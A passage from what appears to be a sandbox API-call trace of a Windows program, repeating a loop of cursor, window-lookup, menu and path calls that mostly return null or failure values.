lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.695] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.695] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.695] GetMenu (hWnd=0x0) returned 0x0 [0027.695] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.695] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.695] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.695] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.695] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.695] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.695] GetStockObject (i=6) returned 0x1b00018 [0027.695] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.695] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.695] PathFileExistsW (pszPath=0x0) returned 0 [0027.695] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.695] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.695] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.695] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.695] GetMenu (hWnd=0x0) returned 0x0 [0027.695] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xd9) returned -1 [0027.695] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.695] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.695] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.695] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.695] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.695] GetStockObject (i=6) returned 0x1b00018 [0027.695] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.695] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.696] PathFileExistsW (pszPath=0x0) returned 0 [0027.696] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.696] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.696] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.696] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.696] GetMenu (hWnd=0x0) returned 0x0 [0027.696] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.696] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.696] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.696] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.696] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.696] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.696] GetStockObject (i=6) returned 0x1b00018 [0027.696] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.696] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.696] PathFileExistsW (pszPath=0x0) returned 0 [0027.696] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.696] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.696] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.696] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.696] GetMenu (hWnd=0x0) returned 0x0 [0027.696] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.696] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.696] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.696] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.696] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.696] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.696] GetStockObject (i=6) returned 0x1b00018 [0027.696] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.696] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.696] PathFileExistsW (pszPath=0x0) returned 0 [0027.696] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.696] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.697] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.697] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.697] GetMenu (hWnd=0x0) returned 0x0 [0027.697] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.697] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.697] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.697] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.697] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.697] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.697] GetStockObject (i=6) returned 0x1b00018 [0027.697] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.697] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.697] PathFileExistsW (pszPath=0x0) returned 0 [0027.697] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.697] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.697] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.697] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.697] GetMenu (hWnd=0x0) returned 0x0 [0027.697] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.697] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.697] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.697] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.697] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.697] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.697] GetStockObject (i=6) returned 0x1b00018 [0027.697] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.697] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.697] PathFileExistsW (pszPath=0x0) returned 0 [0027.697] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.697] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.697] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.697] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.697] GetMenu (hWnd=0x0) returned 0x0 [0027.698] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x467) returned -1 [0027.698] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.698] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.698] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.698] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.698] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.698] GetStockObject (i=6) returned 0x1b00018 [0027.698] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.698] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.698] PathFileExistsW (pszPath=0x0) returned 0 [0027.698] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.698] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.698] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.698] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.698] GetMenu (hWnd=0x0) returned 0x0 [0027.698] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.698] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.698] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.698] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.698] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.698] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.698] GetStockObject (i=6) returned 0x1b00018 [0027.698] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.698] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.698] PathFileExistsW (pszPath=0x0) returned 0 [0027.698] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.698] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.698] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.698] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.698] GetMenu (hWnd=0x0) returned 0x0 [0027.698] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.698] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.699] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.699] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.699] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.699] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.699] GetStockObject (i=6) returned 0x1b00018 [0027.699] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.699] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.699] PathFileExistsW (pszPath=0x0) returned 0 [0027.699] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.699] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.699] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.699] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.699] GetMenu (hWnd=0x0) returned 0x0 [0027.699] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.699] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.699] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.699] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.699] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.699] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.699] GetStockObject (i=6) returned 0x1b00018 [0027.700] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.700] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.700] PathFileExistsW (pszPath=0x0) returned 0 [0027.700] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.700] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.700] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.700] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.700] GetMenu (hWnd=0x0) returned 0x0 [0027.700] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.700] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.700] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.700] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.700] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.700] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.700] GetStockObject (i=6) returned 0x1b00018 [0027.700] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.700] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.700] PathFileExistsW (pszPath=0x0) returned 0 [0027.700] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.700] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.700] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.700] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.700] GetMenu (hWnd=0x0) returned 0x0 [0027.700] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4b) returned -1 [0027.700] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.700] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.700] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.700] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.700] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.700] GetStockObject (i=6) returned 0x1b00018 [0027.700] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.700] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.700] PathFileExistsW (pszPath=0x0) returned 0 [0027.701] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.701] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.701] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.701] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.701] GetMenu (hWnd=0x0) returned 0x0 [0027.701] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.701] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.701] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.701] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.701] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.701] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.701] GetStockObject (i=6) returned 0x1b00018 [0027.701] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.701] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.701] PathFileExistsW (pszPath=0x0) returned 0 [0027.701] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.701] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.701] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.701] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.701] GetMenu (hWnd=0x0) returned 0x0 [0027.701] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.701] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.701] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.701] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.701] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.701] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.701] GetStockObject (i=6) returned 0x1b00018 [0027.701] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.701] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.701] PathFileExistsW (pszPath=0x0) returned 0 [0027.701] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.701] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.702] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.702] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.702] GetMenu (hWnd=0x0) returned 0x0 [0027.702] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.702] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.702] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.702] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.702] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.702] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.702] GetStockObject (i=6) returned 0x1b00018 [0027.702] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.702] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.702] PathFileExistsW (pszPath=0x0) returned 0 [0027.702] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.702] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.702] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.702] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.702] GetMenu (hWnd=0x0) returned 0x0 [0027.702] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.702] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.702] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.702] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.702] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.702] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.702] GetStockObject (i=6) returned 0x1b00018 [0027.702] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.702] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.702] PathFileExistsW (pszPath=0x0) returned 0 [0027.702] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.702] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.702] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.702] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.702] GetMenu (hWnd=0x0) returned 0x0 [0027.702] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x323) returned -1 [0027.703] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.703] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.703] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.703] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.703] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.703] GetStockObject (i=6) returned 0x1b00018 [0027.703] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.703] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.703] PathFileExistsW (pszPath=0x0) returned 0 [0027.703] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.703] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.703] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.703] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.703] GetMenu (hWnd=0x0) returned 0x0 [0027.703] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.703] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.703] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.703] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.703] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.703] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.703] GetStockObject (i=6) returned 0x1b00018 [0027.703] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.703] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.703] PathFileExistsW (pszPath=0x0) returned 0 [0027.703] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.703] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.703] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.703] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.703] GetMenu (hWnd=0x0) returned 0x0 [0027.703] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.703] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.703] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.703] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.703] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.704] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.704] GetStockObject (i=6) returned 0x1b00018 [0027.704] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.704] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.704] PathFileExistsW (pszPath=0x0) returned 0 [0027.704] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.704] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.704] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.704] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.704] GetMenu (hWnd=0x0) returned 0x0 [0027.704] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.704] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.704] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.704] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.704] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.704] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.704] GetStockObject (i=6) returned 0x1b00018 [0027.704] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.704] PathAppendA (in: pszPath=0x0, pMore=0x0 | 